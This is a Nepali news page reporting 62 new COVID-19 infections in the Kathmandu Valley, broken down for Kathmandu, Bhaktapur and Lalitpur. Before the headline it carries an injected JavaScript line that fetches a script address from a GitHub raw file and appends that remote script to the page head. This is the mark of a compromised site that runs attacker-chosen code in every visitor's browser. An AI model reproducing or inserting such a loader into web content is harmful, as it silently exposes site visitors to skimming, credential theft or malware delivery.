;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काठमाडौं उपत्यकामा आज थप ६२ जनामा कोराना पोजेटिभ – जुनेली न्युज
शनिबार, असार २९, २०८२
  • होमपेज
  • काठमाडौं उपत्यकामा आज थप ६२ जनामा कोराना पोजेटिभ
समाचार

काठमाडौं उपत्यकामा आज थप ६२ जनामा कोराना पोजेटिभ

२० साउन, काठमाडौं । पछिल्लो २४ घण्टामा काठमाडौं उपत्यकाका ६२ जनामा कोरोना भाइरस (कोभिड–१९) को संक्रमण पुष्टि भएको छ ।

स्वास्थ्य तथा जनसंख्या मन्त्रालयका अनुसार सबैभन्दा धेरै काठमाडौंमा ४८ जना संक्रमित थपिएका छन् । भक्तपुरमा १३ र ललितपुरका १ जनामा संक्रमण देखिएको मन्त्रालयले जनाएको छ ।

फेसबुक प्रतिक्रियाहरु